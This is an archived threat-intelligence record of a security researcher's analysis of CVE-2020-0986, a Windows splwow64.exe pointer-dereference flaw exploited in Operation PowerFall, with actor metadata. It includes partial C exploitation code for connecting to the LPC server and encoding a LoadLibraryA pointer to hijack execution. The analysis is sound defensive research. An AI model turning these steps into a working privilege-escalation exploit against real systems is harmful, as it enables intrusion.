{
	"id": "ac772996-1b00-41c9-86de-23afc619be98",
	"created_at": "2026-04-06T00:19:19.8395Z",
	"updated_at": "2026-04-10T03:36:33.410406Z",
	"deleted_at": null,
	"sha1_hash": "dcfeac7ff964d5e098e2bc7a7087adda46f01de0",
	"title": "Operation PowerFall: CVE-2020-0986 and variants",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1893534,
	"plain_text": "Operation PowerFall: CVE-2020-0986 and variants\r\nBy Boris Larin\r\nPublished: 2020-09-02 · Archived: 2026-04-05 22:03:06 UTC\r\n02 Sep 2020\r\n 8 minute read\r\n Boris Larin\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 1 of 14\n\nIn August 2020, we published a blog post about Operation PowerFall. This targeted attack consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer 11 and an elevation of privilege exploit\r\ntargeting the latest builds of Windows 10. While we already described the exploit for Internet Explorer in the\r\noriginal blog post, we also promised to share more details about the elevation of privilege exploit in a follow-up\r\npost. Let’s take a look at vulnerability CVE-2020-0986, how it was exploited by attackers, how it was fixed and\r\nwhat additional mitigations were implemented to complicate exploitation of many other similar vulnerabilities.\r\nCVE-2020-0986\r\nCVE-2020-0986 is an arbitrary pointer dereference vulnerability in GDI Print/Print Spooler API. By using this\r\nvulnerability it is possible to manipulate the memory of the splwow64.exe process to achieve execution of\r\narbitrary code in the process and escape the Internet Explorer 11 sandbox because splwow64.exe is running with\r\nmedium integrity level. “Print driver host for applications,” as Microsoft describes splwow64.exe, is a relatively\r\nsmall binary that hosts 64-bit user-mode printer drivers and implements the Local Procedure Call (LPC) server\r\nthat can be used by other processes to access printing functions. This allows the use of 64-bit printer drivers from\r\n32-bit processes. 
Below I provide the code that can be used to spawn splwow64.exe and connect to\r\nsplwow64.exe’s LPC server.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\ntypedef struct _PORT_VIEW\r\n{\r\nUINT64 Length;\r\nHANDLE SectionHandle;\r\nUINT64 SectionOffset;\r\nUINT64 ViewSize;\r\nUCHAR* ViewBase;\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 2 of 14\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\nUCHAR* ViewRemoteBase;\r\n} PORT_VIEW, *PPORT_VIEW;\r\nPORT_VIEW ClientView;\r\ntypedef struct _PORT_MESSAGE_HEADER {\r\nUSHORT DataSize;\r\nUSHORT MessageSize;\r\nUSHORT MessageType;\r\nUSHORT VirtualRangesOffset;\r\nCLIENT_ID ClientId;\r\nUINT64 MessageId;\r\nUINT64 SectionSize;\r\n} PORT_MESSAGE_HEADER, *PPORT_MESSAGE_HEADER;\r\ntypedef struct _PROXY_MSG {\r\nPORT_MESSAGE_HEADER MessageHeader;\r\nUINT64 InputBufSize;\r\nUINT64 InputBuf;\r\nUINT64 OutputBufSize;\r\nUINT64 OutputBuf;\r\nUCHAR Padding[0x1F8];\r\n} PROXY_MSG, *PPORT_MESSAGE;\r\nPROXY_MSG LpcReply;\r\nPROXY_MSG LpcRequest;\r\nint GetPortName(PUNICODE_STRING DestinationString)\r\n{\r\nvoid *tokenHandle;\r\nDWORD sessionId;\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 3 of 14\n\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\nULONG length;\r\nint tokenInformation[16];\r\nWCHAR dst[256];\r\nmemset(tokenInformation, 0, sizeof(tokenInformation));\r\nProcessIdToSessionId(GetCurrentProcessId(), \u0026sessionId);\r\nmemset(dst, 0, sizeof(dst));\r\nif (NtOpenProcessToken(GetCurrentProcess(), READ_CONTROL | TOKEN_QUERY,\r\n\u0026tokenHandle)\r\n|| ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation,\r\nsizeof(tokenInformation), \u0026length))\r\n{\r\nreturn 0;\r\n}\r\nwsprintfW(\r\ndst,\r\nL\"\\\\RPC 
Control\\\\UmpdProxy_%x_%x_%x_%x\",\r\nsessionId,\r\ntokenInformation[2],\r\ntokenInformation[3],\r\n0x2000);\r\nRtlInitUnicodeString(DestinationString, dst);\r\nreturn 1;\r\n}\r\nHANDLE CreatePortSharedBuffer(PUNICODE_STRING PortName)\r\n{\r\nHANDLE sectionHandle = 0;\r\nHANDLE portHandle = 0;\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 4 of 14\n\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\nunion _LARGE_INTEGER maximumSize;\r\nmaximumSize.QuadPart = 0x20000;\r\nNtCreateSection(\u0026sectionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0,\r\n\u0026maximumSize, PAGE_READWRITE, SEC_COMMIT, NULL);\r\nif (sectionHandle)\r\n{\r\nClientView.SectionHandle = sectionHandle;\r\nClientView.Length = 0x30;\r\nClientView.ViewSize = 0x9000;\r\nZwSecureConnectPort(\u0026portHandle, PortName, NULL, \u0026ClientView, NULL, NULL, NULL, NULL,\r\nNULL);\r\n}\r\nreturn portHandle;\r\n}\r\nint main()\r\n{\r\nprintf(\"Spawn splwow64.exe\\n\");\r\nCHAR Path[0x100];\r\nGetCurrentDirectoryA(sizeof(Path), Path);\r\nPathAppendA(Path, \"CreateDC.exe\"); // x86 application with call to CreateDC\r\nWinExec(Path, 0);\r\nSleep(1000);\r\nCreateDCW(L\"Microsoft XPS Document Writer\", L\"Microsoft XPS Document Writer\", NULL,\r\nNULL);\r\nprintf(\"Get port name\\n\");\r\nUNICODE_STRING portName;\r\nif (!GetPortName(\u0026portName))\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 5 of 14\n\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n96\r\n97\r\n98\r\n99\r\n100\r\n101\r\n102\r\n103\r\n104\r\n105\r\n106\r\n107\r\n108\r\n109\r\n110\r\n111\r\n{\r\nprintf(\"Failed to get port name\\n\");\r\nreturn 0;\r\n}\r\nprintf(\"Create port\\n\");\r\nHANDLE portHandle = CreatePortSharedBuffer(\u0026portName);\r\nif (!(portHandle \u0026\u0026 ClientView.ViewBase \u0026\u0026 
ClientView.ViewRemoteBase))\r\n{\r\nprintf(\"Failed to create port\\n\");\r\nreturn 0;\r\n}\r\n}\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 6 of 14\n\n112\r\nTo send data to the LPC server it’s enough to prepare the printer command in the shared memory region and send\r\nan LPC message with NtRequestWaitReplyPort().\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\nmemset(\u0026LpcRequest, 0, sizeof(LpcRequest));\r\nLpcRequest.MessageHeader.DataSize = 0x20;\r\nLpcRequest.MessageHeader.MessageSize = 0x48;\r\nLpcRequest.InputBufSize = 0x88;\r\nLpcRequest.InputBuf = (UINT64)ClientView.ViewRemoteBase; // Points to printer command\r\nLpcRequest.OutputBufSize = 0x10;\r\nLpcRequest.OutputBuf = (UINT64)ClientView.ViewRemoteBase + LpcRequest.InputBufSize;\r\n// TODO: Prepare printer command\r\nNtRequestWaitReplyPort(portHandle, \u0026LpcRequest, \u0026LpcReply);\r\nWhen the LPC message is received, it is processed by the function TLPCMgr::ProcessRequest(PROXY_MSG *).\r\nThis function takes LpcRequest as a parameter and verifies it. After that it allocates a buffer for the printer\r\ncommand and copies it there from shared memory. The printer command function INDEX, which is used to\r\nidentify different driver functions, is stored as a double word at offset 4 in the printer command structure. Almost\r\na complete list of different function INDEX values can be found in the header file winddi.h. This header file\r\nincludes different INDEX values from INDEX_DrvEnablePDEV (0) up to INDEX_LAST (103), but the full list\r\nof INDEX values does not end there. 
Analysis of gdi32full.dll reveals that there are a number of special INDEX\r\nvalues and some of them are provided in the table below (to find them in binary, look for calls to\r\nPROXYPORT::SendRequest).\r\n1\r\n2\r\n3\r\n106 – INDEX_LoadDriver\r\n107 - INDEX_UnloadDriver\r\n109 – INDEX_DocumentEvent\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 7 of 14\n\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n110 – INDEX_StartDocPrinterW\r\n111 – INDEX_StartPagePrinter\r\n112 – INDEX_EndPagePrinter\r\n113 – INDEX_EndDocPrinter\r\n114 – INDEX_AbortPrinter\r\n115 – INDEX_ResetPrinterW\r\n116 – INDEX_QueryColorProfile\r\nFunction TLPCMgr::ProcessRequest(PROXY_MSG *) checks the function INDEX value and if it passes the\r\nchecks, the printer command will be processed by function GdiPrinterThunk in gdi32full.dll.\r\n1\r\n2\r\n3\r\n4\r\n5\r\nif ( IsKernelMsg || INDEX \u003e= 106 \u0026\u0026 (INDEX \u003c= 107 || INDEX - 109 \u003c= 7))\r\n{\r\n    // …\r\n    GdiPrinterThunk(LpcRequestInputBuf, LpcRequestOutputBuf, LpcRequestOutputBufSize);\r\n}\r\nGdiPrinterThunk itself is a very large function that processes more than 60 different function INDEX values, and\r\nthe handler for one of them – namely INDEX_DocumentEvent – contains vulnerability CVE-2020-0986. The\r\nhandler for INDEX_DocumentEvent will use information provided in the printer command (fully controllable\r\nfrom the LPC client) to check that the command is intended for a printer with a valid handle. 
After the check it\r\nwill use the function DecodePointer to decode the pointer of the function stored at the fpDocumentEvent global\r\nvariable (located in .data segment), then use the decoded pointer to execute the function, and finally perform a call\r\nto memcpy() where source, destination and size arguments are obtained from the printer command and are fully\r\ncontrollable by the attacker.\r\nExploitation\r\nIn Windows OS the base addresses of system DLL libraries are randomized with each boot, aiding exploitation of\r\nthis vulnerability. The exploit loads the libraries gdi32full.dll and winspool.drv, and then obtains the offset of the\r\nfpDocumentEvent pointer from gdi32full.dll and the address of the DocumentEvent function from winspool.drv.\r\nAfter that the exploit performs a number of LPC requests with specially crafted INDEX_DocumentEvent\r\ncommands to leak the value of the fpDocumentEvent pointer. The value of the raw pointer is protected using\r\nEncodePointer protection, but the function pointed to by this raw pointer is executed each time the\r\nINDEX_DocumentEvent command is sent and the arguments of this function are fully controllable. All this makes\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 8 of 14\n\nthe fpDocumentEvent pointer the best candidate for an overwrite. A necessary step for exploitation is to encode\r\nour own pointer in such a manner that it will be properly decoded by the function DecodePointer. Since we have\r\nthe value of the encoded pointer and the value of the decoded pointer (address of the DocumentEvent function\r\nfrom winspool.drv), we are able to calculate the secret constant used for pointer encoding and then use it to\r\nencode our own pointer. 
The necessary calculations are provided below.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n// Calculate secret for pointer encoding\r\nwhile (1)\r\n{\r\nsecret = (unsigned int)DocumentEvent ^ __ROL8__(*(UINT64*)leaked_fpDocumentEvent, i \u0026 0x3F);\r\nif ((secret \u0026 0x3F) == i \u0026\u0026 __ROR8__((UINT64)DocumentEvent ^ secret, secret \u0026 0x3F) == *\r\n(UINT64*)leaked_fpDocumentEvent)\r\nbreak;\r\nif (++i \u003e 0x3F)\r\n{\r\nsecret = 0;\r\nbreak;\r\n}\r\n}\r\n// Encode LoadLibraryA pointer with calculated secret\r\nUINT64 encodedPtr = __ROR8__(secret ^ (UINT64)LoadLibraryA, secret \u0026 0x3F);\r\nAt this stage, in order to achieve code execution from the splwow64.exe process, it’s sufficient to overwrite the\r\nfpDocumentEvent pointer with the encoded pointer of function LoadLibraryA and provide the name of a library to\r\nload in the next LPC request with the INDEX_DocumentEvent command.\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 9 of 14\n\nOverview of attack\r\nCVE-2019-0880\r\nAnalysis of CVE-2020-0986 reveals that this vulnerability is the twin brother of the previously discovered CVE-2019-0880. The write-up for CVE-2019-0880 is available here. It’s another vulnerability that was exploited as an\r\nin-the-wild zero-day. CVE-2019-0880 is just another fully controllable call to memcpy() in the same\r\nGdiPrinterThunk function, just a few lines of code away in a handler of function INDEX 118. It seems hard to\r\nbelieve that the developers didn’t notice the existence of a variant for this vulnerability, so why was CVE-2020-\r\n0986 not patched back then and why did it take so long to fix it? It may not be obvious on first glance, but\r\nGdiPrinterThunk is totally broken. 
Even fixing a couple of calls to memcpy doesn’t really help.\r\nArbitrary pointer dereference host for applications\r\nThe problem lies in the fact that almost every function INDEX in GdiPrinterThunk is susceptible to a potential\r\narbitrary pointer dereference vulnerability. Let’s take a look again at the format of the LPC request message.\r\n1\r\n2\r\n3\r\n4\r\ntypedef struct _PROXY_MSG {\r\nPORT_MESSAGE_HEADER MessageHeader;\r\nUINT64 InputBufSize;\r\nUINT64 InputBuf;\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 10 of 14\n\n5\r\n6\r\n7\r\n8\r\nUINT64 OutputBufSize;\r\nUINT64 OutputBuf;\r\nUCHAR Padding[0x1F8];\r\n} PROXY_MSG, *PPORT_MESSAGE;\r\nInputBuf and OutputBuf are both pointers that should point to a shared memory region. InputBuf points to a\r\nlocation where the printer command is prepared, and when this command is processed by GdiPrinterThunk the\r\nresult might be written back to the LPC client using the pointer that was provided as OutputBuf. Many handlers\r\nfor different INDEX values provide data to the LPC client, but the problem is that the pointers InputBuf and\r\nOutputBuf are fully controllable from the LPC client and manipulation of the OutputBuf pointer can lead to an\r\noverwrite of splwow64.exe’s process memory.\r\nHow it was mitigated\r\nMicrosoft fixed CVE-2020-0986, but also implemented a mitigation aimed to make exploitation of OutputBuf\r\nvulnerabilities as hard as possible. Before the patch the function FindPrinterHandle() blindly trusted the data\r\nprovided through the printer command in an LPC request and it was easy to bypass a valid handle check. After the\r\npatch the format of the printer command was changed so it no longer contains the address of the handle table, but\r\ninstead contains a valid driver ID (quad word at offset 0x18). 
Now the linked list of handle tables is stored inside\r\nthe splwow64.exe process and the new function FindDriverForCookie() uses the provided driver ID to get a\r\nhandle table securely. For a printer command to be processed it should contain a valid printer handle (quad word\r\nat offset 0x20). The printer handle consists of process ID and the address of the buffer allocated for the printer\r\ndriver. It is possible to guess some bytes of the printer handle, but a successful real-world brute-force attack on\r\nthis implementation seems to be unlikely. So, it’s safe to assume that this bug class was properly mitigated.\r\nHowever, there are still a couple of places in the code where it is possible to write a 0 for the address provided as\r\nOutputBuf without a handle check, but exploitation in such a scenario doesn’t appear to be feasible.\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 11 of 14\n\nLatest Webinars\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 12 of 14\n\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 13 of 14\n\nReports\r\nKaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka\r\nMustang Panda or Bronze President) APT campaigns, including three variants of a browser data stealer.\r\nKaspersky discloses a 2025 HoneyMyte (aka Mustang Panda or Bronze President) APT campaign, which uses a\r\nkernel-mode rootkit to deliver and protect a ToneShell backdoor.\r\nKaspersky GReAT experts analyze the Evasive Panda APT’s infection chain, including shellcode encrypted with\r\nDPAPI and RC5, as well as the MgBot implant.\r\nKaspersky expert describes new malicious tools employed by the Cloud Atlas APT, including implants of their\r\nsignature backdoors VBShower, VBCloud, PowerShower, and CloudAtlas.\r\nSource: 
https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/"
	],
	"report_names": [
		"98329"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "04a7ebaa-ebb1-4971-b513-a0c86886d932",
			"created_at": "2023-01-06T13:46:38.784965Z",
			"updated_at": "2026-04-10T02:00:03.099088Z",
			"deleted_at": null,
			"main_name": "Inception Framework",
			"aliases": [
				"Clean Ursa",
				"Cloud Atlas",
				"G0100",
				"ATK116",
				"Blue Odin"
			],
			"source_name": "MISPGALAXY:Inception Framework",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f35997d9-ca1e-453f-b968-0e675cc16d97",
			"created_at": "2023-01-06T13:46:39.490819Z",
			"updated_at": "2026-04-10T02:00:03.345364Z",
			"deleted_at": null,
			"main_name": "Evasive Panda",
			"aliases": [
				"BRONZE HIGHLAND"
			],
			"source_name": "MISPGALAXY:Evasive Panda",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c0cedde3-5a9b-430f-9b77-e6568307205e",
			"created_at": "2022-10-25T16:07:23.528994Z",
			"updated_at": "2026-04-10T02:00:04.642473Z",
			"deleted_at": null,
			"main_name": "DarkHotel",
			"aliases": [
				"APT-C-06",
				"ATK 52",
				"CTG-1948",
				"Dubnium",
				"Fallout Team",
				"G0012",
				"G0126",
				"Higaisa",
				"Luder",
				"Operation DarkHotel",
				"Operation Daybreak",
				"Operation Inexsmar",
				"Operation PowerFall",
				"Operation The Gh0st Remains the Same",
				"Purple Pygmy",
				"SIG25",
				"Shadow Crane",
				"T-APT-02",
				"TieOnJoe",
				"Tungsten Bridge",
				"Zigzag Hail"
			],
			"source_name": "ETDA:DarkHotel",
			"tools": [
				"Asruex",
				"DarkHotel",
				"DmaUp3.exe",
				"GreezeBackdoor",
				"Karba",
				"Nemain",
				"Nemim",
				"Ramsay",
				"Retro",
				"Tapaoux",
				"Trojan.Win32.Karba.e",
				"Virus.Win32.Pioneer.dx",
				"igfxext.exe",
				"msieckc.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "05cb998c-6e81-47f0-9806-ee4fda72fe0a",
			"created_at": "2024-11-01T02:00:52.763555Z",
			"updated_at": "2026-04-10T02:00:05.263997Z",
			"deleted_at": null,
			"main_name": "Daggerfly",
			"aliases": [
				"Daggerfly",
				"Evasive Panda",
				"BRONZE HIGHLAND"
			],
			"source_name": "MITRE:Daggerfly",
			"tools": [
				"PlugX",
				"MgBot",
				"BITSAdmin",
				"MacMa",
				"Nightdoor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "812f36f8-e82b-41b6-b9ec-0d23ab0ad6b7",
			"created_at": "2023-01-06T13:46:39.413725Z",
			"updated_at": "2026-04-10T02:00:03.31882Z",
			"deleted_at": null,
			"main_name": "BRONZE HIGHLAND",
			"aliases": [
				"Evasive Panda",
				"Daggerfly"
			],
			"source_name": "MISPGALAXY:BRONZE HIGHLAND",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "19ac84cc-bb2d-4e0c-ace0-5a7659d89ac7",
			"created_at": "2022-10-25T16:07:23.422755Z",
			"updated_at": "2026-04-10T02:00:04.592069Z",
			"deleted_at": null,
			"main_name": "Bronze Highland",
			"aliases": [
				"Daggerfly",
				"Digging Taurus",
				"Evasive Panda",
				"Storm Cloud",
				"StormBamboo",
				"TAG-102",
				"TAG-112"
			],
			"source_name": "ETDA:Bronze Highland",
			"tools": [
				"Agentemis",
				"CDDS",
				"CloudScout",
				"Cobalt Strike",
				"CobaltStrike",
				"DazzleSpy",
				"KsRemote",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MacMa",
				"Macma",
				"MgBot",
				"Mgmbot",
				"NetMM",
				"Nightdoor",
				"OSX.CDDS",
				"POCOSTICK",
				"RELOADEXT",
				"Suzafk",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4f7d2815-7504-4818-bf8d-bba18161b111",
			"created_at": "2025-08-07T02:03:24.613342Z",
			"updated_at": "2026-04-10T02:00:03.732192Z",
			"deleted_at": null,
			"main_name": "BRONZE HIGHLAND",
			"aliases": [
				"Daggerfly",
				"Daggerfly ",
				"Evasive Panda ",
				"Evasive Panda ",
				"Storm Bamboo "
			],
			"source_name": "Secureworks:BRONZE HIGHLAND",
			"tools": [
				"Cobalt Strike",
				"KsRemote",
				"Macma",
				"MgBot",
				"Nightdoor",
				"PlugX"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "02c9f3f6-5d10-456b-9e63-750286048149",
			"created_at": "2022-10-25T16:07:23.722884Z",
			"updated_at": "2026-04-10T02:00:04.72726Z",
			"deleted_at": null,
			"main_name": "Inception Framework",
			"aliases": [
				"ATK 116",
				"Blue Odin",
				"Clean Ursa",
				"Cloud Atlas",
				"G0100",
				"Inception Framework",
				"Operation Cloud Atlas",
				"Operation RedOctober",
				"The Rocra"
			],
			"source_name": "ETDA:Inception Framework",
			"tools": [
				"Lastacloud",
				"PowerShower",
				"VBShower"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434759,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dcfeac7ff964d5e098e2bc7a7087adda46f01de0.pdf",
		"text": "https://archive.orkl.eu/dcfeac7ff964d5e098e2bc7a7087adda46f01de0.txt",
		"img": "https://archive.orkl.eu/dcfeac7ff964d5e098e2bc7a7087adda46f01de0.jpg"
	}
}